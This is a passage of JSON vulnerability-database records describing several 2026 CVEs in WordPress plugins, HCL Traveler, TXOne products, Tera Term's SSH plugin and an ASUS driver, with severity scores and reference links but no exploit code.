Honduras","defaultStatus":"unaffected","versions":[{"version":"0","lessThanOrEqual":"3.2.2","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@wordfence.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.7}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T12:35:14.247454Z","id":"CVE-2026-11324","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@wordfence.com","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"references":[{"url":"https://banco.santander.cl/uploads/000/049/181/1705c2cf-fc73-4fc4-a29d-f56f3ea88103/original/woocommerce-gateway-placetopay-2_24_1-php-8_x.zip","source":"security@wordfence.com"},{"url":"https://evertecinc.com/en/solution/placetopay/","source":"security@wordfence.com"},{"url":"https://github.com/placetopay/woocommerce-gateway-placetopay/blob/3.2.2/src/GatewayMethod.php#L1824","source":"security@wordfence.com"},{"url":"https://github.com/placetopay/woocommerce-gateway-placetopay/blob/3.2.2/src/GatewayMethod.php#L1852","source":"security@wordfence.com"},{"url":"https://github.com/placetopay/woocommerce-gateway-placetopay/blob/3.2.2/src/GatewayMethod.php#L600","source":"security@wordfence.com"},{"url":"https://github.com/placetopay/woocommerce-gateway-placetopay/blob/3.2.2/src/GatewayMethod.php#L718","source":"security@wordfence.com"},{"url":"https://github.com/placetopay/woocommerce-gateway-placetopay/releases/tag/3.2.2","source":"security@wordfence.com"},{"url":"https://www.wordfence.com/threat-intel/vulnerabilities/id/8ca87868-357b-4d71-9bf9-cd3b15b2555d?source=cve","source":"security@wordfence.com"}]}},{"cve":{"id":"CVE-2026-13352","sourceIdentifier":"security@wordfence.com","published":"2026-07-17T05:16:36.730","lastModified":"2026-07-17T16:17:13.187","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress plugin for WordPress is vulnerable to Arbitrary File Upload in all versions up to, and including, 4.16.18 via the allowed_mime_types function. This is due to the unconditional registration of an upload_mimes filter that adds executable file extensions (.exe, .apk, .msi) to the global WordPress MIME allowlist, without scoping the expansion to digital-product upload contexts. This makes it possible for authenticated attackers, with author-level access and above, to upload files that may be executable, which makes remote code execution possible. This filter is registered globally on every request regardless of whether the digital products feature is configured or in use, meaning the expanded MIME allowlist affects all WordPress upload contexts site-wide."}],"affected":[{"source":"security@wordfence.com","affectedData":[{"vendor":"properfraction","product":"Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress","defaultStatus":"unaffected","versions":[{"version":"0","lessThanOrEqual":"4.16.18","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@wordfence.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","baseScore":8.8,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":5.9}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T14:53:58.782649Z","id":"CVE-2026-13352","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@wordfence.com","type":"Secondary","description":[{"lang":"en","value":"CWE-434"}]}],"references":[{"url":"https://plugins.trac.wordpress.org/browser/wp-user-avatar/tags/4.16.14/src/Membership/DigitalProducts/Init.php#L9","source":"security@wordfence.com"},{"url":"https://plugins.trac.wordpress.org/browser/wp-user-avatar/tags/4.16.14/src/Membership/DigitalProducts/UploadHandler.php#L18","source":"security@wordfence.com"},{"url":"https://plugins.trac.wordpress.org/browser/wp-user-avatar/tags/4.16.14/src/Membership/DigitalProducts/UploadHandler.php#L49","source":"security@wordfence.com"},{"url":"https://plugins.trac.wordpress.org/browser/wp-user-avatar/tags/4.16.18/src/Membership/DigitalProducts/Init.php#L9","source":"security@wordfence.com"},{"url":"https://plugins.trac.wordpress.org/browser/wp-user-avatar/tags/4.16.18/src/Membership/DigitalProducts/UploadHandler.php#L18","source":"security@wordfence.com"},{"url":"https://plugins.trac.wordpress.org/browser/wp-user-avatar/tags/4.16.18/src/Membership/DigitalProducts/UploadHandler.php#L49","source":"security@wordfence.com"},{"url":"https://plugins.trac.wordpress.org/changeset?reponame=&old=3599012%40wp-user-avatar&new=3599012%40wp-user-avatar","source":"security@wordfence.com"},{"url":"https://www.wordfence.com/threat-intel/vulnerabilities/id/9bb520df-e838-4335-bd4f-97026082a204?source=cve","source":"security@wordfence.com"}]}},{"cve":{"id":"CVE-2026-13765","sourceIdentifier":"security@wordfence.com","published":"2026-07-17T05:16:37.837","lastModified":"2026-07-17T19:17:12.640","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"The LearnPress – WordPress LMS Plugin for Create and Sell Online Courses plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.4.1 via the check_answer. This makes it possible for unauthenticated attackers to extract the correct-answer markers, full option lists, explanations, and question content for any quiz question on the site — including questions belonging to paid courses the attacker is not enrolled in."}],"affected":[{"source":"security@wordfence.com","affectedData":[{"vendor":"thimpress","product":"LearnPress – WordPress LMS Plugin for Create and Sell Online Courses","defaultStatus":"unaffected","versions":[{"version":"0","lessThanOrEqual":"4.4.1","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@wordfence.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T12:34:55.158070Z","id":"CVE-2026-13765","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@wordfence.com","type":"Secondary","description":[{"lang":"en","value":"CWE-862"}]}],"references":[{"url":"https://plugins.trac.wordpress.org/browser/learnpress/tags/4.3.6/inc/course/class-lp-course-no-required-enroll.php#L145","source":"security@wordfence.com"},{"url":"https://plugins.trac.wordpress.org/browser/learnpress/tags/4.3.6/inc/lp-template-functions.php#L1422","source":"security@wordfence.com"},{"url":"https://plugins.trac.wordpress.org/browser/learnpress/tags/4.3.6/inc/rest-api/v1/frontend/class-lp-rest-users-controller.php#L181","source":"security@wordfence.com"},{"url":"https://plugins.trac.wordpress.org/browser/learnpress/tags/4.3.6/inc/rest-api/v1/frontend/class-lp-rest-users-controller.php#L434","source":"security@wordfence.com"},{"url":"https://plugins.trac.wordpress.org/browser/learnpress/tags/4.3.6/inc/rest-api/v1/frontend/class-lp-rest-users-controller.php#L54","source":"security@wordfence.com"},{"url":"https://plugins.trac.wordpress.org/browser/learnpress/tags/4.3.6/inc/rest-api/v1/frontend/class-lp-rest-users-controller.php#L80","source":"security@wordfence.com"},{"url":"https://plugins.trac.wordpress.org/browser/learnpress/tags/4.4.1/inc/course/class-lp-course-no-required-enroll.php#L145","source":"security@wordfence.com"},{"url":"https://plugins.trac.wordpress.org/browser/learnpress/tags/4.4.1/inc/lp-template-functions.php#L1422","source":"security@wordfence.com"},{"url":"https://plugins.trac.wordpress.org/browser/learnpress/tags/4.4.1/inc/rest-api/v1/frontend/class-lp-rest-users-controller.php#L181","source":"security@wordfence.com"},{"url":"https://plugins.trac.wordpress.org/browser/learnpress/tags/4.4.1/inc/rest-api/v1/frontend/class-lp-rest-users-controller.php#L434","source":"security@wordfence.com"},{"url":"https://plugins.trac.wordpress.org/browser/learnpress/tags/4.4.1/inc/rest-api/v1/frontend/class-lp-rest-users-controller.php#L54","source":"security@wordfence.com"},{"url":"https://plugins.trac.wordpress.org/browser/learnpress/tags/4.4.1/inc/rest-api/v1/frontend/class-lp-rest-users-controller.php#L80","source":"security@wordfence.com"},{"url":"https://plugins.trac.wordpress.org/changeset?reponame=&old=3603546%40learnpress&new=3603546%40learnpress","source":"security@wordfence.com"},{"url":"https://www.wordfence.com/threat-intel/vulnerabilities/id/ee3bbf20-43fd-4977-b0ba-b81e7a3810d0?source=cve","source":"security@wordfence.com"}]}},{"cve":{"id":"CVE-2026-15759","sourceIdentifier":"security@wordfence.com","published":"2026-07-17T05:16:38.447","lastModified":"2026-07-17T16:17:14.060","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"The ChatHelp – Click to Chat Button, WooCommerce Chat to Order & Floating Chat Form plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'number' and 'group' Shortcode Attributes in all versions up to, and including, 3.5.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}],"affected":[{"source":"security@wordfence.com","affectedData":[{"vendor":"themeatelier","product":"ChatHelp – Click to Chat Button, WooCommerce Chat to Order & Floating Chat Form","defaultStatus":"unaffected","versions":[{"version":"0","lessThanOrEqual":"3.5.1","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@wordfence.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N","baseScore":6.4,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":3.1,"impactScore":2.7}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T14:53:33.752986Z","id":"CVE-2026-15759","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@wordfence.com","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"references":[{"url":"https://plugins.trac.wordpress.org/browser/chat-help/tags/3.5.1/src/Frontend/Shortcode/CustomButtonsTemplates.php#L138","source":"security@wordfence.com"},{"url":"https://plugins.trac.wordpress.org/browser/chat-help/tags/3.5.1/src/Frontend/Shortcode/CustomButtonsTemplates.php#L66","source":"security@wordfence.com"},{"url":"https://plugins.trac.wordpress.org/browser/chat-help/tags/3.5.1/src/Frontend/Shortcode/CustomButtonsTemplates.php#L76","source":"security@wordfence.com"},{"url":"https://plugins.trac.wordpress.org/browser/chat-help/tags/3.5.1/src/Frontend/Shortcode/CustomShortcode.php#L38","source":"security@wordfence.com"},{"url":"https://plugins.trac.wordpress.org/browser/chat-help/tags/3.5.1/src/Includes/ChatHelp.php#L192","source":"security@wordfence.com"},{"url":"https://plugins.trac.wordpress.org/changeset?reponame=&old=3609732%40chat-help&new=3609732%40chat-help","source":"security@wordfence.com"},{"url":"https://www.wordfence.com/threat-intel/vulnerabilities/id/c3ec4978-0d51-4ca1-b0cf-81aaa4d43f7b?source=cve","source":"security@wordfence.com"}]}},{"cve":{"id":"CVE-2026-21770","sourceIdentifier":"psirt@hcl.com","published":"2026-07-17T05:16:38.567","lastModified":"2026-07-17T18:11:59.263","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"HCL Traveler for Microsoft Outlook (HTMO) is susceptible to a DLL hijacking vulnerability which could allow an attacker to modify or replace the application with malicious content."}],"affected":[{"source":"psirt@hcl.com","affectedData":[{"vendor":"HCLSoftware","product":"HCL Traveler for Microsoft Outlook (HTMO)","defaultStatus":"unaffected","versions":[{"version":"< 3.0.16","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@hcl.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"HIGH","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":0.6,"impactScore":5.9}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T13:03:54.584105Z","id":"CVE-2026-21770","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@hcl.com","type":"Secondary","description":[{"lang":"en","value":"CWE-427"}]}],"references":[{"url":"https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130919","source":"psirt@hcl.com"}]}},{"cve":{"id":"CVE-2026-41993","sourceIdentifier":"3ad20294-822c-4ebc-9301-f9a7cf62d46e","published":"2026-07-17T05:16:39.007","lastModified":"2026-07-17T18:11:59.263","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Access Control vulnerability in the Removable Media Validation function of TXOne Networks products allows a local attacker with administrator privileges to bypass the file lockdown mechanism, resulting in unauthorized file transfer to the victim device. The attacker needs to deploy unauthorized file on the removable media in advance. This issue affects SafePortAgent: before 3.2.5024; StellarProtect: from 3.2.4011 before 5.0.1083."}],"affected":[{"source":"3ad20294-822c-4ebc-9301-f9a7cf62d46e","affectedData":[{"vendor":"TXOne Networks","product":"SafePortAgent","defaultStatus":"unaffected","versions":[{"version":"0","lessThan":"3.2.5024","versionType":"custom","status":"affected"}]},{"vendor":"TXOne Networks","product":"StellarProtect","defaultStatus":"unaffected","versions":[{"version":"3.2.4011","lessThan":"5.0.1083","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"3ad20294-822c-4ebc-9301-f9a7cf62d46e","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":6.7,"baseSeverity":"MEDIUM","attackVector":"LOCAL","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"HIGH","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"3ad20294-822c-4ebc-9301-f9a7cf62d46e","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N","baseScore":4.4,"baseSeverity":"MEDIUM","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"HIGH","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":0.8,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T13:10:16.753708Z","id":"CVE-2026-41993","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"references":[{"url":"https://www.txone.com/psirt/cve-2026-41993/","source":"3ad20294-822c-4ebc-9301-f9a7cf62d46e"}]}},{"cve":{"id":"CVE-2026-58317","sourceIdentifier":"vultures@jpcert.or.jp","published":"2026-07-17T05:16:40.180","lastModified":"2026-07-17T17:56:08.130","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Unsigned to Signed Conversion Error (CWE-196) vulnerability exists in TTSSH2 plugin of Tera Term provided by TeraTerm Project. When Tera Term attempts to establish an SSH connection to a server set up by an attacker, out-of-bounds read/write may occur. As a result, the contents of adjacent memory regions may be transmitted to the server, and Tera Term may behave unexpected or terminate abnormally."}],"affected":[{"source":"vultures@jpcert.or.jp","affectedData":[{"vendor":"TeraTerm Project","product":"TTSSH2","defaultStatus":"unaffected","versions":[{"version":"1.00 alpha1","lessThanOrEqual":"3.6.1","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"vultures@jpcert.or.jp","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":5.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"ACTIVE","vulnConfidentialityImpact":"LOW","vulnIntegrityImpact":"LOW","vulnAvailabilityImpact":"LOW","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV30":[{"source":"vultures@jpcert.or.jp","type":"Secondary","cvssData":{"version":"3.0","vectorString":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L","baseScore":6.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":2.8,"impactScore":3.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T13:06:11.360435Z","id":"CVE-2026-58317","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"vultures@jpcert.or.jp","type":"Secondary","description":[{"lang":"en","value":"CWE-196"}]}],"references":[{"url":"https://jvn.jp/en/jp/JVN65294474/","source":"vultures@jpcert.or.jp"},{"url":"https://teratermproject.github.io/SA/JVN65294474-en.html","source":"vultures@jpcert.or.jp"},{"url":"https://teratermproject.github.io/SA/JVN65294474.html","source":"vultures@jpcert.or.jp"}]}},{"cve":{"id":"CVE-2026-60060","sourceIdentifier":"vultures@jpcert.or.jp","published":"2026-07-17T05:16:41.360","lastModified":"2026-07-17T17:56:08.130","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Handling of Length Parameter Inconsistency (CWE-130) vulnerability exists in TTSSH2 plugin of Tera Term provided by TeraTerm Project. When Tera Term attempts to establish an SSH connection to a server set up by an attacker, out-of-bounds read/write may occur. As a result, the contents of adjacent memory regions may be transmitted to the server, and Tera Term may behave unexpected or terminate abnormally."}],"affected":[{"source":"vultures@jpcert.or.jp","affectedData":[{"vendor":"TeraTerm Project","product":"TTSSH2","defaultStatus":"unaffected","versions":[{"version":"1.00 alpha1","lessThanOrEqual":"3.6.1","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"vultures@jpcert.or.jp","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":5.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"ACTIVE","vulnConfidentialityImpact":"LOW","vulnIntegrityImpact":"LOW","vulnAvailabilityImpact":"LOW","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV30":[{"source":"vultures@jpcert.or.jp","type":"Secondary","cvssData":{"version":"3.0","vectorString":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L","baseScore":6.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":2.8,"impactScore":3.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T13:09:03.491244Z","id":"CVE-2026-60060","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"vultures@jpcert.or.jp","type":"Secondary","description":[{"lang":"en","value":"CWE-130"}]}],"references":[{"url":"https://jvn.jp/en/jp/JVN65294474/","source":"vultures@jpcert.or.jp"},{"url":"https://teratermproject.github.io/SA/JVN65294474-en.html","source":"vultures@jpcert.or.jp"},{"url":"https://teratermproject.github.io/SA/JVN65294474.html","source":"vultures@jpcert.or.jp"}]}},{"cve":{"id":"CVE-2026-15094","sourceIdentifier":"security@wordfence.com","published":"2026-07-17T06:16:36.367","lastModified":"2026-07-17T19:17:12.747","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"The WP Hotel Booking plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'check_in_date' parameter in all versions up to, and including, 2.3.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link."}],"affected":[{"source":"security@wordfence.com","affectedData":[{"vendor":"thimpress","product":"WP Hotel Booking","defaultStatus":"unaffected","versions":[{"version":"0","lessThanOrEqual":"2.3.2","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@wordfence.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.7}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T12:34:40.050999Z","id":"CVE-2026-15094","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@wordfence.com","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"references":[{"url":"https://plugins.trac.wordpress.org/browser/wp-hotel-booking/tags/2.3.2/includes/TemplateHooks/ArchiveRoomTemplate.php#L262","source":"security@wordfence.com"},{"url":"https://plugins.trac.wordpress.org/browser/wp-hotel-booking/tags/2.3.2/includes/TemplateHooks/ArchiveRoomTemplate.php#L54","source":"security@wordfence.com"},{"url":"https://plugins.trac.wordpress.org/browser/wp-hotel-booking/tags/2.3.2/includes/class-wphb-helpers.php#L29","source":"security@wordfence.com"},{"url":"https://plugins.trac.wordpress.org/browser/wp-hotel-booking/tags/2.3.2/includes/wphb-functions.php#L733","source":"security@wordfence.com"},{"url":"https://plugins.trac.wordpress.org/changeset?reponame=&old=3609563%40wp-hotel-booking&new=3609563%40wp-hotel-booking","source":"security@wordfence.com"},{"url":"https://www.wordfence.com/threat-intel/vulnerabilities/id/8139f512-7bc9-45ae-83d7-bf496e1ad56d?source=cve","source":"security@wordfence.com"}]}},{"cve":{"id":"CVE-2019-25764","sourceIdentifier":"54bf65a7-a193-42d2-b1ba-8e150d3c35e1","published":"2026-07-17T07:16:37.193","lastModified":"2026-07-17T18:10:29.780","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"**UNSUPPORTED WHEN ASSIGNED**  Exposed IOCTL with Insufficient Access Control in the ASUS AURA SYNC driver allows a local user to bypass the driver's verification and invoke arbitrary IOCTLs, resulting in privilege escalation.\n\nRefer to the 'End-of-Life Notice and Driver Update for Legacy ASUS Drivers ' section on the ASUS Security Advisory for more information."}],"affected":[{"source":"54bf65a7-a193-42d2-b1ba-8e150d3c35e1","affectedData":[{"vendor":"ASUS","product":"AURA SYNC","defaultStatus":"unaffected","versions":[{"version":"0","lessThan":"1.07.84","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"54bf65a7-a193-42d2-b1ba-8e150d3c35e1","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":7.3,"baseSeverity":"HIGH","attackVector":"LOCAL","attackComplexity":"HIGH","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"HIGH","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINE